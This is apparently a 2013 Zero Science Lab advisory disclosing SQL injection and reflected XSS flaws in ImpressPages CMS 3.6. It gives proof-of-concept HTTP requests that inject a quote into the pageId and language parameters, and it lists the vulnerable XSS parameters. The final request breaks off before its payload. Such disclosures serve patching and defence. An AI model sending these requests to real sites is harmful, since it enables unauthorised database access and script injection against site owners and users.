ImpressPages CMS v3.6 Multiple XSS/SQLi Vulnerabilities Vendor: ImpressPages UAB Product web page: http://www.impresspages.org Affected version: 3.6 Summary: ImpressPages CMS is an open source web content management system with revolutionary drag & drop interface. Desc: Input passed via several parameters is not properly sanitized before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and HTML/script code in a user's browser session in context of an affected site. Tested on: Microsoft Windows 7 Ultimate SP1 (EN) Apache 2.4.2 PHP 5.4.7 MySQL 5.5.25a Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2013-5157 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5157.php Vendor: http://www.impresspages.org/blog/impresspages-cms-3-7-is-mobile-as-never-before/ 12.10.2013 -- ================================== SQL Injection: (pageId param) POST /impresspages/?cms_action=manage HTTP/1.1 Host: localhost Proxy-Connection: keep-alive Content-Length: 124 Accept: application/json, text/javascript, */*; q=0.01 Origin: http://localhost X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://localhost/impresspages/?cms_action=manage Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Cookie: ses819=k7e9hu9pk4ol4h9l0lbt5q73u1 g=standard&m=content_management&a=getPageOptionsHtml&securityToken=c029f7293955df089676b78af8222d2a&pageId=64'&zoneName=menu1 ================================== SQL Injection: (language param) POST /impresspages/admin.php?module_id=436&action=export&security_token=381cb48be4ed7445a9e6303e64ae87ac HTTP/1.1 Host: localhost Proxy-Connection: keep-alive Content-Length: 404 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://localhost User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybBHOjmAcICeilnDe Referer: http://localhost/impresspages/admin.php?module_id=436&security_token=381cb48be4ed7445a9e6303e64ae87ac Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Cookie: ses819=k7e9hu9pk4ol4h9l0lbt5q73u1 ------WebKitFormBoundarybBHOjmAcICeilnDe Content-Disposition: form-data; name="language" 344' ------WebKitFormBoundarybBHOjmAcICeilnDe Content-Disposition: form-data; name="spec_security_code" 9f1ff00ea8fd9fd8f2d421ba5ec45a18 ------WebKitFormBoundarybBHOjmAcICeilnDe Content-Disposition: form-data; name="spec_rand_name" lib_php_form_standard_2_ ------WebKitFormBoundarybBHOjmAcICeilnDe-- ================================== Reflected XSS POST parameters: - files[0][file] - instanceId - pageOptions[buttonTitle] - pageOptions[createdOn] - pageOptions[description] - pageOptions[keywords] - pageOptions[lastModified] - pageOptions[layout] - pageOptions[pageTitle] - pageOptions[redirectURL] - pageOptions[rss] - pageOptions[type] - pageOptions[url] - pageOptions[visible] - revisionId - widgetName - pageSize[0] - page[0] - road[] ================================== POST /impresspages/?cms_action=manage HTTP/1.1 Host: localhost Proxy-Connection: keep-alive Content-Length: 155 Accept: application/json, text/javascript, */*; q=0.01 Origin: http://localhost X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://localhost/impresspages/?cms_action=manage Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Cookie: ses819=k7e9hu9pk4ol4h9l0lbt5q73u1 g=standard&m=content_management&a=deleteWidget&securityToken=c029f7293955df089676b78af8222d2a&instanceId= ...